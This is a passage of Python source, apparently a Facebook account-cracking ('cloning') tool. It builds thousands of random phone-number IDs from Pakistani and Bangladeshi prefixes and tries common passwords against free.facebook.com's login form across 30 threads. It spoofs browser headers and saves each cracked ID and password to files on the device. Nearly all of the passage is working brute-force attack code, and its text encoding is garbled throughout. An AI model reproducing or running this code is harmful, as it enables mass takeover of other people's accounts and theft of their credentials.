 ยยยยยยยยยยยย"sec-fetch-dest":ย'manifest', 
 ยยยยยยยยยยยย"sec-fetch-mode":ย'cors', 
 ยยยยยยยยยยยย"sec-fetch-site":ย'same-origin', 
 ยยยยยยยยยยยย"user-agent":pro,}) 
 ยยยยยยยยยยยยloย=ยsession.post('https://free.facebook.com/login/device-based/regular/login/?refsrc=deprecated&amp;lwv=100&amp;refid=8',data=log_data,headers=header).text 
 ยยยยยยยยยยยยlog_cookies=session.cookies.get_dict().keys() 
 ยยยยยยยยยยยยifย'c_user'ยinยlog_cookies: 
 ยยยยยยยยยยยยยยยยcoki=";".join([key+"="+valueยforยkey,valueยinยsession.cookies.get_dict().items()]) 
 ยยยยยยยยยยยยยยยยuidย=ยcoki[7:22] 
 ยยยยยยยยยยยยยยยยos.system("play-audioย๐ฐ๐บ๐ฐ๐๐ท_OK.mp3") 
 ยยยยยยยยยยยยยยยยprint('\r\033[1;32m[๐ฐ๐บ๐ฐ๐๐ท-OK]ย'+uid+'ย[โ]ย'+ps+ย'') 
 ยยยยยยยยยยยยยยยยcek_apk(session,coki) 
 ยยยยยยยยยยยยยยยยopen('/sdcard/๐ฐ๐บ๐ฐ๐๐ท-OK.txt',ย'a').write(uid+'ย|ย'+ps+'\n') 
 ยยยยยยยยยยยยยยยยok.append(uid) 
 ยยยยยยยยยยยยelifย'checkpoint'ยinยlog_cookies: 
 ยยยยยยยยยยยยยยยยifย'Enterยloginยcodeยtoยcontinue'ยinยlog_cookies: 
 ยยยยยยยยยยยยยยยยยยยยcoki=";".join([key+"="+valueยforยkey,valueยinยsession.cookies.get_dict().items()]) 
 ยยยยยยยยยยยยยยยยยยยยuid=coki[24:39] 
 ยยยยยยยยยยยยยยยยยยยยos.system("play-audioย๐ฐ๐บ๐ฐ๐๐ท_2F.mp3") 
 ยยยยยยยยยยยยยยยยยยยยprint('\r\033[1;34m[๐ฐ๐บ๐ฐ๐๐ท-2F]ย'+uid+'ย[~]ย'+ps+'ย') 
 ยยยยยยยยยยยยยยยยยยยยopen('/sdcard/๐ฐ๐บ๐ฐ๐๐ท-2F.txt',ย'a').write(uid+'ย|ย'+ps+'\n') 
 ยยยยยยยยยยยยยยยยยยยยtwf.append(uid) 
 ยยยยยยยยยยยยยยยยelse: 
 ยยยยยยยยยยยยยยยยยยยยcoki=";".join([key+"="+valueยforยkey,valueยinยsession.cookies.get_dict().items()]) 
 ยยยยยยยยยยยยยยยยยยยยuid=coki[24:39] 
 ยยยยยยยยยยยยยยยยยยยยRedย=ย'\033[1;31m' 
 ยยยยยยยยยยยยยยยยยยยยos.system("play-audioย๐ฐ๐บ๐ฐ๐๐ท_CP.mp3") 
 ยยยยยยยยยยยยยยยยยยยยprint(f'\r\033[1;30m[๐ฐ๐บ๐ฐ๐๐ท-CP]ย'+uid+'ย[ร]ย'+ps+ย'ย') 
 ยยยยยยยยยยยยยยยยยยยยopen('/sdcard/๐ฐ๐บ๐ฐ๐๐ท-CP.txt',ย'a').write(uid+'ย|ย'+ps+'\n') 
 ยยยยยยยยยยยยยยยยยยยยcp.append(uid) 
 ยยยยยยยยยยยยยยยยยยยยbreak 
 ยยยยยยยยยยยยelse: 
 ยยยยยยยยยยยยยยยยcontinue 
 ยยยยยยยยloop+=1 
 ยยยยยยยยsys.stdout.write(f'\r\33[1;37m[๐ฐ๐บ๐ฐ๐๐ทย๐ฅ]ย[%s]ย\33[1;97m[OK:%s{๐ฐ๐บ๐ฐ๐๐ท2}CP:%s]'%(loop,len(ok),len(cp))),ย 
 ยยยยยยยยsys.stdout.flush() 
 ยยยยยยยยchecks(ok,cp) 
 ยยยยexcept: 
 ยยยยยยยยpass 
 #---------------------[PASSย5ยCLONINGยMENU]---------------------# 
 defยpassword5(): 
 ยยยยuser=[] 
 ยยยย 
 ยยยยos.getuid 
 ยยยยos.geteuid 
 ยยยยos.system("clear") 
 ยยยยprint(logo) 
 ยยยยprint(f"") 
 ยยยยclear() 
 ยยยยprint(f"ยยยยยยยยยย\x1b[97m[\033[37;41mยยCยOยDยEยยยยMยEยNยUยยย\033[0;m]") 
 ยยยยprint(f"") 
 ยยยยlinex() 
 ยยยยprint(f"ยยยยยยยย\x1b[97m[\033[95;42mEXAMPLEย:๐\033[0;m]") 
 ยยยยprint(f"") 
 ยยยยprint(f"ย0306ย,0300ย,0315ย,0333") 
 ยยยยprint(f"ย0341ย,0342ย,0345ย,0349") 
 ยยยยprint(f"ย0321ย,0316ย,0308ย,0309") 
 ยยยยprint(f"") 
 ยยยยlinex() 
 ยยยยprint(f"\x1b[97m[\033[37;41mBESTยCODEย0300ย/ย0302ย/ย0306ย/ย0349ย/0315ยยย\033[0;m]") 
 ยยยยprint("") 
 ยยยยlinex() 
 ยยยยcodeย=ยinput('ยPUTยCODEย:ย') 
 ยยยยos.system("clear") 
 ยยยยprint(logo) 
 ยยยยprint(f"") 
 ยยยยprint(f"ยยยยยยยยยย\x1b[97m[\033[37;41mยยLยIยMยIยTยยยMยEยNยUยยย\033[0;m]") 
 ยยยยprint(f"") 
 ยยยยlimitย=ยint(input('ยEXAMPLE:ย2000,ย3000,ย50000,ย100000\n\nยPUTยCLONINGยLIMIT:ย')) 
 ยยยยforยnmbrยinยrange(limit): 
 ยยยยยยยยnmpย=ย''.join(random.choice(string.digits)ยforย_ยinยrange(7)) 
 ยยยยยยยยuser.append(nmp) 
 ยยยยwithยThreadPool(max_workers=30)ยasยmanshera:ยยยย 
 ยยยยยยยยclear() 
 ยยยยยยยยtlย=ยstr(len(user)) 
 ยยยยยยยยprint(f"ย{WHITE}TOTALยIDZยยยยยยยยยยยยย:ย{BLUE}"+tl+"ย~>ย[ยSLOWย๐]") 
 ยยยยยยยยprint(f"ย{WHITE}COUNTRYยYOUยCHOOSEยยยย:ย{GREEN}PAKISTANย๐ต๐ฐ") 
 ยยยยยยยยprint(f"ย{WHITE}NUMBERยYOUยPUTยยยยยยยย:ย{YELLOW}"+code) 
 ยยยยยยยยprint(f"ย{WHITE}TODAYยDATEย&ยTIMEยยยยย:{RED}ย{ha}/{bu}/{ta}ย{ORANGE}~>ย{GREEN}ย"+str(a)+":"+str(lt()[4])+"ย"+ยtag+"ย") 
 ยยยยยยยยprint(f"ย{WHITE}TOยSTOPยPROCESSยPRESSยCtrlย+ยZย") 
 ยยยยยยยยprint(f'{RED}==========================================================') 
 ยยยยยยยยforยloveยinยuser: 
 ยยยยยยยยยยยยuidย=ยcode+love 
 ยยยยยยยยยยยยpwxย=ย[love,code+love,'786786','123456','pakistan'] 
 ยยยยยยยยยยยยmanshera.submit(free,uid,pwx,tl) 
 defยfree(uid,pwx,tl): 
 ยยยยglobalยloop 
 ยยยยglobalยok 
 ยยยยglobalยagents 
 ยยยยtry: 
 ยยยยยยยยforยpsยinยpwx: 
 ยยยยยยยยยยยยbiย=ยrandom.choice([A]) 
 ยยยยยยยยยยยยsessionย=ยrequests.Session() 
 ยยยยยยยยยยยยproย=ยrandom.choice(ugen) 
 ยยยยยยยยยยยยfree_fbย=ยsession.get('https://free.facebook.com').text 
 ยยยยยยยยยยยยlog_dataย=ย{ 
 ยยยยยยยยยยยยยยยย"lsd":re.search('name="lsd"ยvalue="(.*?)"',ยstr(free_fb)).group(1), 
 ยยยยยยยยยยยย"jazoest":re.search('name="jazoest"ยvalue="(.*?)"',ยstr(free_fb)).group(1), 
 ยยยยยยยยยยยย"m_ts":re.search('name="m_ts"ยvalue="(.*?)"',ยstr(free_fb)).group(1), 
 ยยยยยยยยยยยย"li":re.search('name="li"ยvalue="(.*?)"',ยstr(free_fb)).group(1), 
 ยยยยยยยยยยยย"try_number":"0", 
 ยยยยยยยยยยยย"unrecognized_tries":"0", 
 ยยยยยยยยยยยย"email":uid, 
 ยยยยยยยยยยยย"pass":ps, 
 ยยยยยยยยยยยย"login":"LogยIn"} 
 ยยยยยยยยยยยยheaderย=ย({"authority":ย'free.facebook.com', 
 ยยยยยยยยยยยย"method":ย'GET', 
 ยยยยยยยยยยย"scheme":ย'https', 
 ยยยยยยยยยยยย"accept":ย'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*[insertedยbyยcythonยtoยavoidยcommentยcloser]/[insertedยbyยcythonยtoยavoidยcommentยstart]*;q=0.8,application/signed-exchange;v=b3;q=0.9', 
 ยยยยยยยยยยยย"accept-encoding":ย'gzip,ยdeflate,ยbr', 
 ยยยยยยยยยยยย"accept-language":ย'en-US,en;q=0.9', 
 ยยยยยยยยยยยย"cache-control":ย'no-cache', 
 ยยยยยยยยยยยย"pragma":ย'no-cache', 
 ยยยยยยยยยยยย"referer":ย'https://free.facebook.com/', 
 ยยยยยยยยยยยย"sec-ch-ua":ย'".Not/A)Brand";v="99",ย"GoogleยChrome";v="103",ย"Chromium";v="103"', 
 ยยยยยยยยยยยย"sec-ch-ua-mobile":ย'?0', 
 ยยยยยยยยยยยย"sec-ch-ua-platform":'"Windows"', 
 ยยยยยยยยยยยย"sec-fetch-dest":ย'manifest', 
 ยยยยยยยยยยยย"sec-fetch-mode":ย'cors', 
 ยยยยยยยยยยยย"sec-fetch-site":ย'same-origin', 
 ยยยยยยยยยยยย"user-agent":pro,}) 
 ยยยยยยยยยยยยloย=ยsession.post('https://free.facebook.com/login/device-based/regular/login/?refsrc=deprecated&amp;lwv=100&amp;refid=8',data=log_data,headers=header).text 
 ยยยยยยยยยยยยlog_cookies=session.cookies.get_dict().keys() 
 ยยยยยยยยยยยยifย'c_user'ยinยlog_cookies: 
 ยยยยยยยยยยยยยยยยcoki=";".join([key+"="+valueยforยkey,valueยinยsession.cookies.get_dict().items()]) 
 ยยยยยยยยยยยยยยยยuidย=ยcoki[7:22] 
 ยยยยยยยยยยยยยยยยos.system("play-audioย๐ฐ๐บ๐ฐ๐๐ท_OK.mp3") 
 ยยยยยยยยยยยยยยยยprint('\r\033[1;32m[๐ฐ๐บ๐ฐ๐๐ท-OK]ย'+uid+'ย[โ]ย'+ps+ย'') 
 ยยยยยยยยยยยยยยยยcek_apk(session,coki) 
 ยยยยยยยยยยยยยยยยopen('/sdcard/๐ฐ๐บ๐ฐ๐๐ท-OK.txt',ย'a').write(uid+'ย|ย'+ps+'\n') 
 ยยยยยยยยยยยยยยยยok.append(uid) 
 ยยยยยยยยยยยยelifย'checkpoint'ยinยlog_cookies: 
 ยยยยยยยยยยยยยยยยifย'Enterยloginยcodeยtoยcontinue'ยinยlog_cookies: 
 ยยยยยยยยยยยยยยยยยยยยcoki=";".join([key+"="+valueยforยkey,valueยinยsession.cookies.get_dict().items()]) 
 ยยยยยยยยยยยยยยยยยยยยuid=coki[24:39] 
 ยยยยยยยยยยยยยยยยยยยยos.system("play-audioย๐ฐ๐บ๐ฐ๐๐ท_2F.mp3") 
 ยยยยยยยยยยยยยยยยยยยยprint('\r\033[1;34m[๐ฐ๐บ๐ฐ๐๐ท-2F]ย'+uid+'ย[~]ย'+ps+'ย') 
 ยยยยยยยยยยยยยยยยยยยยopen('/sdcard/๐ฐ๐บ๐ฐ๐๐ท-2F.txt',ย'a').write(uid+'ย|ย'+ps+'\n') 
 ยยยยยยยยยยยยยยยยยยยยtwf.append(uid) 
 ยยยยยยยยยยยยยยยยelse: 
 ยยยยยยยยยยยยยยยยยยยยcoki=";".join([key+"="+valueยforยkey,valueยinยsession.cookies.get_dict().items()]) 
 ยยยยยยยยยยยยยยยยยยยยuid=coki[24:39] 
 ยยยยยยยยยยยยยยยยยยยยRedย=ย'\033[1;31m' 
 ยยยยยยยยยยยยยยยยยยยยos.system("play-audioย๐ฐ๐บ๐ฐ๐๐ท_CP.mp3") 
 ยยยยยยยยยยยยยยยยยยยยprint(f'\r\033[1;30m[๐ฐ๐บ๐ฐ๐๐ท-CP]ย'+uid+'ย[ร]ย'+ps+ย'ย') 
 ยยยยยยยยยยยยยยยยยยยยopen('/sdcard/๐ฐ๐บ๐ฐ๐๐ท-CP.txt',ย'a').write(uid+'ย|ย'+ps+'\n') 
 ยยยยยยยยยยยยยยยยยยยยcp.append(uid) 
 ยยยยยยยยยยยยยยยยยยยยbreak 
 ยยยยยยยยยยยยelse: 
 ยยยยยยยยยยยยยยยยcontinue 
 ยยยยยยยยloop+=1 
 ยยยยยยยยsys.stdout.write(f'\r\33[1;37m[๐ฐ๐บ๐ฐ๐๐ทย๐ฅ]ย[%s]ย\33[1;97m[OK:%s{๐ฐ๐บ๐ฐ๐๐ท2}CP:%s]'%(loop,len(ok),len(cp))),ย 
 ยยยยยยยยsys.stdout.flush() 
 ยยยยยยยยchecks(ok,cp) 
 ยยยยexcept: 
 ยยยยยยยยpass 
 #---------------------[MAINยCLONINGยDEFย2]---------------------# 
  
  
 defยTabii2(): 
 ยยยยuser=[] 
 ยยยย 
 ยยยยos.getuid 
 ยยยยos.geteuid 
 ยยยยclear() 
 ยยยยprint(f"ยยยยยยยยยย\x1b[97m[\033[37;41mยยCยOยDยEยยยยMยEยNยUยยย\033[0;m]") 
 ยยยยprint(f"") 
 ยยยยlinex() 
 ยยยยprint(f"ยยยยยยยย\x1b[97m[\033[95;42mEXAMPLEย:๐\033[0;m]") 
 ยยยยprint(f"") 
 ยยยยprint('ย880171ย,ย880172ย,ย880173ย\nย880174ย,ย880191ย,ย880192\nย880193ย,ย880194ย,ย880181\nย880182ย,ย880183ย,ย880184\nย880161ย,ย880162ย,ย880163ย') 
 ยยยยprint(f"") 
 ยยยยlinex() 
 ยยยยcodeย=ยinput('ยPUTยCODEย:ย') 
 ยยยยos.system("clear") 
 ยยยยprint(logo) 
 ยยยยprint(f"") 
 ยยยยprint(f"ยยยยยยยยยย\x1b[97m[\033[37;41mยยLยIยMยIยTยยยMยEยNยUยยย\033[0;m]") 
 ยยยยprint(f"") 
 ยยยยlimitย=ยint(input('ยEXAMPLE:ย1000,ย2000,ย5000,ย10000\n\nยPUTยCLONINGยLIMIT:ย')) 
 ยยยยforยnmbrยinยrange(limit): 
 ยยยยยยยยnmpย=ย''.join(random.choice(string.digits)ยforย_ยinยrange(7)) 
 ยยยยยยยยuser.append(nmp) 
 ยยยยwithยThreadPool(max_workers=30)ยasยmanshera:ยยยย 
 ยยยยยยยยclear() 
 ยยยยยยยยtlย=ยstr(len(user)) 
 ยยยยยยยยprint(f"\nย{WHITE}TOTALยIDZยยยยยยยยยยยยย:ย{RED}"+tl) 
 ยยยยยยยยprint(f"ย{WHITE}COUNTRYยYOUยCHOOSEยยยย:ย{RED}BANGLADESHย๐ง๐ฉ") 
 ยยยยยยยยprint(f"ย{WHITE}NUMBERยYOUยPUTยยยยยยยย:ย{RED}"+code) 
 ยยยยยยยยprint(f"ย{WHITE}PROCESSยHASยBEENยSTARTED") 
 ยยยยยยยยprint(f"ย{WHITE}BEยPATIENT.......") 
 ยยยยยยยยprint(f"ย{WHITE}TOยSTOPยPROCESSยCtrlย+ยZย") 
 ยยยยยยยยprint(f'{RED}==========================================================') 
 ยยยยยยยยforยloveยinยuser: 
 ยยยยยยยยยยยยuidย=ยcode+love 
 ยยยยยยยยยยยยpwxย=ย[love,'786786','123456'] 
 ยยยยยยยยยยยยmanshera.submit(m,uid,pwx,tl) 
 defยm(uid,pwx,tl): 
 ยยยยglobalยloop 
 ยยยยglobalยok 
 ยยยยglobalยagents 
 ยยยยtry: 
 ยยยยยยยยforยpsยinยpwx: 
 ยยยยยยยยยยยยbiย=ยrandom.choice([A]) 
 ยยยยยยยยยยยยsessionย=ยrequests.Session() 
 ยยยยยยยยยยยยproย=ยrandom.choice(ugen) 
 ยยยยยยยยยยยยproย=ยrandom.choice(ugen) 
 ยยยยยยยยยยยยfree_fbย=ยsession.get('https://free.facebook.com').text 
 ยยยยยยยยยยยยlog_dataย=ย{ 
 ยยยยยยยยยยยยยยยย"lsd":re.search('name="lsd"ยvalue="(.*?)"',ยstr(free_fb)).group(1), 
 ยยยยยยยยยยยย"jazoest":re.search('name="jazoest"ยvalue="(.*?)"',ยstr(free_fb)).group(1), 
 ยยยยยยยยยยยย"m_ts":re.search('name="m_ts"ยvalue="(.*?)"',ยstr(free_fb)).group(1), 
 ยยยยยยยยยยยย"li":re.search('name="li"ยvalue="(.*?)"',ยstr(free_fb)).group(1), 
 ยยยยยยยยยยยย"try_number":"0", 
 ยยยยยยยยยยยย"unrecognized_tries":"0", 
 ยยยยยยยยยยยย"email":uid, 
 ยยยยยยยยยยยย"pass":ps, 
 ยยยยยยยยยยยย"login":"LogยIn"} 
 ยยยยยยยยยยยยheaderย=ย({"authority":ย'free.facebook.com', 
 ยยยยยยยยยยยย"method":ย'GET', 
 ยยยยยยยยยยยย"scheme":ย'https', 
 ยยยยยยยยยยยย"accept":ย'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*[insertedยbyยcythonยtoยavoidยcommentยcloser]/[insertedยbyยcythonยtoยavoidยcommentยstart]*;q=0.8,application/signed-exchange;v=b3;q=0.9', 
 ยยยยยยยยยยยย"accept-encoding":ย'gzip,ยdeflate,ยbr', 
 ยยยยยยยยยยยย"accept-language":ย'en-US,en;q=0.9', 
 ยยยยยยยยยยยย"cache-control":ย'no-cache', 
 ยยยยยยยยยยยย"pragma":ย'no-cache', 
 ยยยยยยยยยยยย"referer":ย'https://free.facebook.com/', 
 ยยยยยยยยยยยย"sec-ch-ua":ย'".Not/A)Brand";v="99",ย"GoogleยChrome";v="103",ย"Chromium";v="103"', 
 ยยยยยยยยยยยย"sec-ch-ua-mobile":ย'?0', 
 ยยยยยยยยยยยย"sec-ch-ua-platform":'"Windows"', 
 ยยยยยยยยยยยย"sec-fetch-dest":ย'manifest', 
 ยยยยยยยยยยยย"sec-fetch-mode":ย'cors', 
 ยยยยยยยยยยยย"sec-fetch-site":ย'same-origin', 
 ยยยยยยยยยยยย"user-agent":pro,}) 
 ยยยยยยยยยยยยloย=ยsession.post('https://free.facebook.com/login/device-based/regular/login/?refsrc=deprecated&amp;lwv=100&amp;refid=8',data=log_data,headers=header).text 
 ยยยยยยยยยยยยlog_cookies=session.cookies.get_dict().keys() 
 ยยยยยยยยยยยยifย'c_user'ยinยlog_cookies: 
 ยยยยยยยยยยยยยยยยcoki=";".join([key+"="+valueยforยkey,valueยinยsession.cookies.get_dict().items()]) 
 ยยยยยยยยยยยยยยยยuidย=ยcoki[7:22] 
 ยยยยยยยยยยยยยยยยos.system("play-audioย๐ฐ๐บ๐ฐ๐๐ท_OK.mp3") 
 ยยยยยยยยยยยยยยยยprint('\r\033[1;32m[๐ฐ๐บ๐ฐ๐๐ท-OK]ย'+uid+'ย[โ]ย'+ps+ย'') 
 ยยยยยยยยยยยยยยยยcek_apk(session,coki) 
 ยยยยยยยยยยยยยยยยopen('/sdcard/๐ฐ๐บ๐ฐ๐๐ท-OK.txt',ย'a').write(uid+'ย|ย'+ps+'\n') 
 ยยยยยยยยยยยยยยยยok.append(uid) 
 ยยยยยยยยยยยยelifย'checkpoint'ยinยlog_cookies: 
 ยยยยยยยยยยยยยยยยifย'Enterยloginยcodeยtoยcontinue'ยinยlog_cookies: 
 ยยยยยยยยยยยยยยยยยยยยcoki=";".join([key+"="+valueยforยkey,valueยinยsession.cookies.get_dict().items()]) 
 ยยยยยยยยยยยยยยยยยยยยuid=coki[24:39] 
 ยยยยยยยยยยยยยยยยยยยยos.system("play-audioย๐ฐ๐บ๐ฐ๐๐ท_2F.mp3") 
 ยยยยยยยยยยยยยยยยยยยยprint('\r\033[1;34m[๐ฐ๐บ๐ฐ๐๐ท-2F]ย'+uid+'ย[~]ย'+ps+'ย') 
 ยยยยยยยยยยยยยยยยยยยยopen('/sdcard/๐ฐ๐บ๐ฐ๐๐ท-2F.txt',ย'a').write(uid+'ย|ย'+ps+'\n') 
 ยยยยยยยยยยยยยยยยยยยยtwf.append(uid) 
 ยยยยยยยยยยยยยยยยelse: 
 ยยยยยยยยยยยยยยยยยยยยcoki=";".join([key+"="+valueยforยkey,valueยinยsession.cookies.get_dict().items()]) 
 ยยยยยยยยยยยยยยยยยยยยuid=coki[24:39] 
 ยยยยยยยยยยยยยยยยยยยยRedย=ย'\033[1;31m' 
 ยยยยยยยยยยยยยยยยยยยยos.system("play-audioย๐ฐ๐บ๐ฐ๐๐ท_CP.mp3") 
 ยยยยยยยยยยยยยยยยยยยยprint(f'\r\033[1;30m[๐ฐ๐บ๐ฐ๐๐ท-CP]ย'+uid+'ย[ร]ย'+ps+ย'ย') 
 ยยยยยยยยยยยยยยยยยยยยopen('/sdcard/๐ฐ๐บ๐ฐ๐๐ท-CP.txt',ย'a').write(uid+'ย|ย'+ps+'\n') 
 ยยยยยยยยยยยยยยยยยยยยcp.append(uid) 
 ยยยยยยยยยยยยยยยยยยยยbreak 
 ยยยยยยยยยยยยelse: 
 ยยยยยยยยยยยยยยยยcontinue 
 ยยยยยยยยloop+=1 
 ยยยยยยยยsys.stdout.write(f'\r\33[1;37m[๐ฐ๐บ๐ฐ๐๐ทย๐ฅ]ย[%s]ย\33[1;97m[OK:%s{๐ฐ๐บ๐ฐ๐๐ท2}CP:%s]'%(loop,len(ok),len(cp))),ย 
 ยยยยยยยยsys.stdout.flush() 
 ยยยยยยยยchecks(ok,cp) 
 ยยยยexcept: 
 ยยยยยยยยpass 
  
  
  
  
 ifย__name__ย==ย'__main__': 
 ยยยยxyz() 
  
 ยยยยยยยยยยยยยยยย
